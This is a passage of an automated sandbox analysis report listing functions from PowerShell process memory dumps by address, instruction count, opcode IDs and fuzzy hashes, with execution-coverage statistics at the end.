                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_4c00000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3b4d175c8b0555db0251b76fd76b856b238097ba03f5beebd0fe417ea09aca11
                                                                                                                    • Instruction ID: a58ef1ce8f3ab971dd06cd514ebc64dd14634a045874f94640cd5c4e840068e0
                                                                                                                    • Opcode Fuzzy Hash: 3b4d175c8b0555db0251b76fd76b856b238097ba03f5beebd0fe417ea09aca11
                                                                                                                    • Instruction Fuzzy Hash: B4519070A012189FDB18DFB9D8946ADBBF2FF89350F14852AD005EB790DB75AC81CB50
                                                                                                                    Function 04C077E8 Relevance: .1, Instructions: 114COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2372601114.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_4c00000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ae9368cf81d4f21b9024dc770c548df8c007432a3f05c4dc1e813e74d781a329
                                                                                                                    • Instruction ID: b92784516ab8d59738c5f98cb4b41a52fe21c097860a7aaf4dafde4fc5fcfc70
                                                                                                                    • Opcode Fuzzy Hash: ae9368cf81d4f21b9024dc770c548df8c007432a3f05c4dc1e813e74d781a329
                                                                                                                    • Instruction Fuzzy Hash: 03416B70A01218DFDB18DFB9C8946ADBBB2FF89350F14C529D006AB7A0DB75AD85CB50
                                                                                                                    Function 04C02B00 Relevance: .1, Instructions: 110COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2372601114.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_4c00000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: aec8be41800c9847221b3d64e2d9caa6fee43592084a8760023572e937d88262
                                                                                                                    • Instruction ID: 41deec769a6f7448b4fe67027e18d92b6f8ff531a1a0b25cb3a3feebb9bfac0e
                                                                                                                    • Opcode Fuzzy Hash: aec8be41800c9847221b3d64e2d9caa6fee43592084a8760023572e937d88262
                                                                                                                    • Instruction Fuzzy Hash: 22411A74A005059FCB05CF59C4D8AAEFBB2FF48310B258599D955AB3A4C732FD91CBA0
                                                                                                                    Function 04C082D0 Relevance: .1, Instructions: 109COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2372601114.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_4c00000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 254b11d7f16eef3f61ae70499b073f3996ccfc55fba2a639b0f8bd44b7454dbf
                                                                                                                    • Instruction ID: cefc37896a243d40c3bdcb17372404a8ae8326918dd05b0fc531ca2cd5fcbc3b
                                                                                                                    • Opcode Fuzzy Hash: 254b11d7f16eef3f61ae70499b073f3996ccfc55fba2a639b0f8bd44b7454dbf
                                                                                                                    • Instruction Fuzzy Hash: 9131F830E047498BDB15EFB5C4505AEBFB2EFC5300F14C52AD406AB691DBB4B985CBA0
                                                                                                                    Function 04C086B9 Relevance: .1, Instructions: 99COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2372601114.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_4c00000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d5d52cce02299674cb651d3e4530533f36db817704f8ae23c59340e08605557a
                                                                                                                    • Instruction ID: 95fb30c5a1b476ebed6d43d73ad5becbfddea24f852a3b3e33685fc2fed31e04
                                                                                                                    • Opcode Fuzzy Hash: d5d52cce02299674cb651d3e4530533f36db817704f8ae23c59340e08605557a
                                                                                                                    • Instruction Fuzzy Hash: 1441CA74A011198FDB65DF69CD90F99BBF1BF88300F1185E9D509AB391D630AE85CF90
                                                                                                                    Function 04C08854 Relevance: .1, Instructions: 96COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2372601114.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_4c00000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d93d1a44ce3b2ec6eb1efba573d45a5470fc1bda70765133ecc0c95a6476c303
                                                                                                                    • Instruction ID: c6680ca65d8dbce0e132dffcd991b488c566d5cad4b1082aac0ce502d731f7b5
                                                                                                                    • Opcode Fuzzy Hash: d93d1a44ce3b2ec6eb1efba573d45a5470fc1bda70765133ecc0c95a6476c303
                                                                                                                    • Instruction Fuzzy Hash: C5410974A011198FDB25DF68C990F9DB7B2FF88204F1086E5D409AB395DB34AE81CF90
                                                                                                                    Function 04C082C0 Relevance: .1, Instructions: 87COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2372601114.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_4c00000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bfd5516803d20ecfdb162b87b9a452ef53d10179c0c13ec4e046747d573b38ba
                                                                                                                    • Instruction ID: 6574fe0ffd9d6b146d59f7810993bef09439c612031354ac0abd277cd09c4eed
                                                                                                                    • Opcode Fuzzy Hash: bfd5516803d20ecfdb162b87b9a452ef53d10179c0c13ec4e046747d573b38ba
                                                                                                                    • Instruction Fuzzy Hash: D3314131E017468BDB14EFA5D4505EEFBB2FF84300F14C62AD505AB690EB747986CBA0
                                                                                                                    Function 04C076BA Relevance: .1, Instructions: 80COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2372601114.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_4c00000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f7ef163d475beab68a83288d25df2053c234643903e23f9530c748b08bc9bda9
                                                                                                                    • Instruction ID: 7fc284184973bd8b2e7a214417cbb7e153a39ec0b9e026961737de9699ab0735
                                                                                                                    • Opcode Fuzzy Hash: f7ef163d475beab68a83288d25df2053c234643903e23f9530c748b08bc9bda9
                                                                                                                    • Instruction Fuzzy Hash: 70317C357002058FDB18DF29C898A9E7BF2EF89351F148069E506EB3B1DB71AC81CB90
                                                                                                                    Function 04C085B0 Relevance: .1, Instructions: 77COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2372601114.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_4c00000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8eefb0c74b282cda4986173a8a1a81b2750da3436438a7f9112c81d18dbea6bc
                                                                                                                    • Instruction ID: cbed9dac3a595585bcf637e9237f7ba0da986e80107eabb78fa12ced577871dd
                                                                                                                    • Opcode Fuzzy Hash: 8eefb0c74b282cda4986173a8a1a81b2750da3436438a7f9112c81d18dbea6bc
                                                                                                                    • Instruction Fuzzy Hash: A621493000E7C16FC713DB68C8A84A5BFB49E4326474E41DFC5C88F1A7C228A958C7B2
                                                                                                                    Function 0333D006 Relevance: .0, Instructions: 47COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2368807765.000000000333D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0333D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_333d000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 78fc29cbf8f2ea25e3e18fbd2881aab73bd363ea4975e65d70f8ba88064c057a
                                                                                                                    • Instruction ID: a89126526a88694c67199a1718dcb5689c993614b997077f79b355d29764efa1
                                                                                                                    • Opcode Fuzzy Hash: 78fc29cbf8f2ea25e3e18fbd2881aab73bd363ea4975e65d70f8ba88064c057a
                                                                                                                    • Instruction Fuzzy Hash: 6C014C7240D3C09FE7128B258D94792BFA8EF53624F1984DBE8888F1A7D2685C45CB72
                                                                                                                    Function 0333D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2368807765.000000000333D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0333D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_333d000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5356813c99c8d290a1eb66957abef678c0f3c1d147003d4f63bd08b3faf0e8ae
                                                                                                                    • Instruction ID: 6d887da2339165a2d5e56e0dba5aec572d93a186b3a0fd978e0ce1129bd5ef1c
                                                                                                                    • Opcode Fuzzy Hash: 5356813c99c8d290a1eb66957abef678c0f3c1d147003d4f63bd08b3faf0e8ae
                                                                                                                    • Instruction Fuzzy Hash: EE01F2724043009AE721CA29CDC4BA6FF9CEF42B30F1CC45AEC480A242C27D9941CAB1
                                                                                                                    Function 04C070A8 Relevance: .0, Instructions: 36COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2372601114.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_4c00000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8eb8d6e687bb4acc0997e87761f9249379c030d2d7651cbbe99224b2d9e80cdf
                                                                                                                    • Instruction ID: 174d75f8d5fcc7b73c1c1e971208559247a955a1d9a76461153ecbf006e80900
                                                                                                                    • Opcode Fuzzy Hash: 8eb8d6e687bb4acc0997e87761f9249379c030d2d7651cbbe99224b2d9e80cdf
                                                                                                                    • Instruction Fuzzy Hash: 96017878A0528A8FCB41CF6CC08699EBFF0FF09210F5041D9E509EB362D330A981CB81
                                                                                                                    Function 04C070B8 Relevance: .0, Instructions: 28COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2372601114.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_4c00000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b6974b5554f85d1f284f2a9e9163f39baf496992238d54bc473fb4edd695f6f9
                                                                                                                    • Instruction ID: cc1c59b471f35fa0d3207dfa978f6f14946960b7153c54790e7453a3178d1240
                                                                                                                    • Opcode Fuzzy Hash: b6974b5554f85d1f284f2a9e9163f39baf496992238d54bc473fb4edd695f6f9
                                                                                                                    • Instruction Fuzzy Hash: FEF0A974E0020A8FCB80DF68D485AAEBBF5FF49310F505199E509DB361E730A951CB91
                                                                                                                    Function 04C08270 Relevance: .0, Instructions: 27COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2372601114.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_4c00000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 82047e39ae63f89964f55a81ba0f1f2918a35aa2d80995da006b4a61a834f246
                                                                                                                    • Instruction ID: 184424d479118e0097dc573616b6651984163aec195bb2e59f28c950c24ec839
                                                                                                                    • Opcode Fuzzy Hash: 82047e39ae63f89964f55a81ba0f1f2918a35aa2d80995da006b4a61a834f246
                                                                                                                    • Instruction Fuzzy Hash: 31F0ED31204B415BC306D768E8506EA77A2EFC1304F04896AE652CB696CF70B8A587E1
                                                                                                                    Function 04C07BB0 Relevance: .0, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2372601114.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_4c00000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: eec77c2bf30fa10cbf75da870b1b4d9904edde5aea04c18bd60fa209359e49ad
                                                                                                                    • Instruction ID: d0c7c0421e15681884ec38aaa153ccc542fbe42e7161d8e5894e9c44ef07b3ab
                                                                                                                    • Opcode Fuzzy Hash: eec77c2bf30fa10cbf75da870b1b4d9904edde5aea04c18bd60fa209359e49ad
                                                                                                                    • Instruction Fuzzy Hash: 1DD05E36704314274F2422BE789C82BBACEE6C9175315443AA50DD3701ED7A8C4145A0
                                                                                                                    Function 04C07BEC Relevance: .0, Instructions: 17COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2372601114.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_4c00000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a8fe97ca5e491b3a867aac191eb6de48c50445a5b58db88cc8e892008ca1543e
                                                                                                                    • Instruction ID: d7ed7ba3931a8c3bff440071b2ad23ca4e39d56358b86fb15e6ccccd207af812
                                                                                                                    • Opcode Fuzzy Hash: a8fe97ca5e491b3a867aac191eb6de48c50445a5b58db88cc8e892008ca1543e
                                                                                                                    • Instruction Fuzzy Hash: FCD05E392402549FCB01EB68F088DA97FE1EF4D361B1581A9E90ADB332CB31CC818B51
                                                                                                                    Function 04C07BF0 Relevance: .0, Instructions: 16COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2372601114.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_4c00000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 623e8c9a70c398c74131328c10b008b50eba3999da6d73d0ae6522cc0366cc63
                                                                                                                    • Instruction ID: 6f75a2ddd48dfe5b8ef24f8ad349783953c5edfc9a2266d892ae7a15d97d3ff9
                                                                                                                    • Opcode Fuzzy Hash: 623e8c9a70c398c74131328c10b008b50eba3999da6d73d0ae6522cc0366cc63
                                                                                                                    • Instruction Fuzzy Hash: 1CD05E392002149FC700EB68E488D557BA9EB4D660B0180A5EA0987322CB31DC808B91

                                                                                                                    Executed Functions

                                                                                                                    Function 07B700F0 Relevance: 14.2, Strings: 11, Instructions: 496COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.2475123978.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_7b70000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ,e{q$4'eq$4'eq$4'eq$4'eq$$eq$$eq$$eq$$eq$$eq$$eq
                                                                                                                    • API String ID: 0-2739431817
                                                                                                                    • Opcode ID: 3538bdfbfc0ce6edb11471f2be4a0733b6a7d3f370e09caa2617a9491ab23509
                                                                                                                    • Instruction ID: b7cf1f6b263c83f7831009f5379d194fd2f3abe54ba05ce3fea26f6d7288cfb3
                                                                                                                    • Opcode Fuzzy Hash: 3538bdfbfc0ce6edb11471f2be4a0733b6a7d3f370e09caa2617a9491ab23509
                                                                                                                    • Instruction Fuzzy Hash: 9FF1D6F1704206DFEB25AF69C94466ABBA2EF85310F14C0ABE429DB291DB31D941C791
                                                                                                                    Function 034971FB Relevance: .9, Instructions: 861COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.2370957170.0000000003490000.00000040.00000800.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_3490000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c6531bedb036ca1bf387d9cb78766cb2dbac32ce1436c7ea695422527d83b319
                                                                                                                    • Instruction ID: 3022186fd0b59a2480e7c0b1cf8548fbb4877aa0b1a52bc1b5f6b51affb56e6f
                                                                                                                    • Opcode Fuzzy Hash: c6531bedb036ca1bf387d9cb78766cb2dbac32ce1436c7ea695422527d83b319
                                                                                                                    • Instruction Fuzzy Hash: 2A410B74A012198FEB25DF69CD50F99BBB1FF88200F1186DAD508AB391DA349E85CF94
                                                                                                                    Function 03497388 Relevance: .2, Instructions: 164COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.2370957170.0000000003490000.00000040.00000800.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_3490000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cc36cc99b3b96e521fc22bd48a7c70ac0a1b5f8715ed24793b25ec96c36f35cc
                                                                                                                    • Instruction ID: f3a8331343396f7b9daea0fd792cd4cddedde1ac5f221d975a527af018414a83
                                                                                                                    • Opcode Fuzzy Hash: cc36cc99b3b96e521fc22bd48a7c70ac0a1b5f8715ed24793b25ec96c36f35cc
                                                                                                                    • Instruction Fuzzy Hash: 29515934A01254CFEB25DB78C954B6E7BF2AF89244F2445AAD006EB3A1DF359D82CF10
                                                                                                                    Function 03492F08 Relevance: .1, Instructions: 106COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.2370957170.0000000003490000.00000040.00000800.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_3490000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b144b77a5aabc1cc070030707ae8c203b798da4cc8238e07aaca88d657e2e7da
                                                                                                                    • Instruction ID: 502e865622da9cd26b233ebe0d99f742cf92ce28ec5bb09082f42a10cb732d61
                                                                                                                    • Opcode Fuzzy Hash: b144b77a5aabc1cc070030707ae8c203b798da4cc8238e07aaca88d657e2e7da
                                                                                                                    • Instruction Fuzzy Hash: E9413C74A005099FDB09CF59C1D49AEFBB5FF48310B25859AD855AB364C732FC90CB94
                                                                                                                    Function 034970BC Relevance: .1, Instructions: 103COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.2370957170.0000000003490000.00000040.00000800.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_3490000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9e8405f42a3e2b12f54bd5db50d60db46fc4fd0e77c562a1249f143fdf20bf79
                                                                                                                    • Instruction ID: 1333fb51bd96d398669e87f951a27fced5e71420000f391787f06ce56756eed4
                                                                                                                    • Opcode Fuzzy Hash: 9e8405f42a3e2b12f54bd5db50d60db46fc4fd0e77c562a1249f143fdf20bf79
                                                                                                                    • Instruction Fuzzy Hash: 2D21682142E3C21FDF17C33498A64A6BFB49D03124B1E48DBC5C4CF2A3C229980AC77A
                                                                                                                    Function 03497394 Relevance: .1, Instructions: 96COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.2370957170.0000000003490000.00000040.00000800.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_3490000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 342df2b948da197430804c00761a213872719153cf5c263598f804b537f999f0
                                                                                                                    • Instruction ID: 6d232fab0a885c2ad89ecba840aafa311e48023242e2b93ee6473ce15c17570e
                                                                                                                    • Opcode Fuzzy Hash: 342df2b948da197430804c00761a213872719153cf5c263598f804b537f999f0
                                                                                                                    • Instruction Fuzzy Hash: A4412974A011298FDB25DF69C990F9DBBB2FF88204F5086D6D408AB395DB349E81CF94
                                                                                                                    Function 03496F20 Relevance: .1, Instructions: 54COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.2370957170.0000000003490000.00000040.00000800.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_3490000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 57d0b9cd9ebc7038191c8def993fe0c8a49718cd07ee6e782f12704d87842f6f
                                                                                                                    • Instruction ID: cb14af5bbed630627a4ffe22ee693ff8916e202ecea2ffe61ef87fae169db853
                                                                                                                    • Opcode Fuzzy Hash: 57d0b9cd9ebc7038191c8def993fe0c8a49718cd07ee6e782f12704d87842f6f
                                                                                                                    • Instruction Fuzzy Hash: 20116A709082858FDB42DF78C48095ABFF4EF06220F5640DBD154DF2A7E2359946CBA6
                                                                                                                    Function 0342D006 Relevance: .0, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.2367974825.000000000342D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0342D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_342d000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1522040722a926fadd2dab368cdc401abc6a1a58d14d7a525ec25f37cacf3ef6
                                                                                                                    • Instruction ID: 5241604e0d4e26a9d4ebf3503fbe04f25224ea081bcbd170e041bea8c5fc519e
                                                                                                                    • Opcode Fuzzy Hash: 1522040722a926fadd2dab368cdc401abc6a1a58d14d7a525ec25f37cacf3ef6
                                                                                                                    • Instruction Fuzzy Hash: 42016D6240E3C05FD7128B258D94A52BFB4EF43224F1D80DBD8888F2A3C2695848C772
                                                                                                                    Function 0342D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.2367974825.000000000342D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0342D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_342d000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 18b98f349594db7226b60fbf33798cfc60e894bd8dd9de9caac09a29cbc8def2
                                                                                                                    • Instruction ID: ab231f5bfdc240865f1ee0ca45a7539096a5a811b9ea3c78b6f64560c8a9d35e
                                                                                                                    • Opcode Fuzzy Hash: 18b98f349594db7226b60fbf33798cfc60e894bd8dd9de9caac09a29cbc8def2
                                                                                                                    • Instruction Fuzzy Hash: FF01F7718043109AE720CA15CD84767FF98EF43338F9CC45BEC686E292C2799842C6B5
                                                                                                                    Function 03496F50 Relevance: .0, Instructions: 28COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.2370957170.0000000003490000.00000040.00000800.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_3490000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 12ad349bcdd1aa053438f51f5e7572ddf719b6e3a833503e50aa7fd959d4afdf
                                                                                                                    • Instruction ID: 46605f85e025b5038b9c5ec9443bc9544c253de8532e69590155046c43640cce
                                                                                                                    • Opcode Fuzzy Hash: 12ad349bcdd1aa053438f51f5e7572ddf719b6e3a833503e50aa7fd959d4afdf
                                                                                                                    • Instruction Fuzzy Hash: 8EF0A974E0020A8FCB80DF68C485AAEBBF5FF49314F504199E509DB321D730A941CBD1

                                                                                                                    Non-executed Functions

                                                                                                                    Function 07B707EB Relevance: 7.6, Strings: 6, Instructions: 79COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.2475123978.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_7b70000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'eq$4'eq$4'eq$4'eq$$eq$$eq
                                                                                                                    • API String ID: 0-2296023852
                                                                                                                    • Opcode ID: e64b758c7847803e65db39167d1f91e9753463a13d03ac7b7b9e2a86a0db5279
                                                                                                                    • Instruction ID: 5f5d0a0ceaff7468c1b29d7c0f8fa034643cd63d4c8718a259ef4c893c6261c5
                                                                                                                    • Opcode Fuzzy Hash: e64b758c7847803e65db39167d1f91e9753463a13d03ac7b7b9e2a86a0db5279
                                                                                                                    • Instruction Fuzzy Hash: 61113AF2B092168FD7357528282517BABA3EFD251072901EFC051DB386DE248C42C3E2

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:1.8%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:29.6%
                                                                                                                    Total number of Nodes:479
                                                                                                                    Total number of Limit Nodes:34
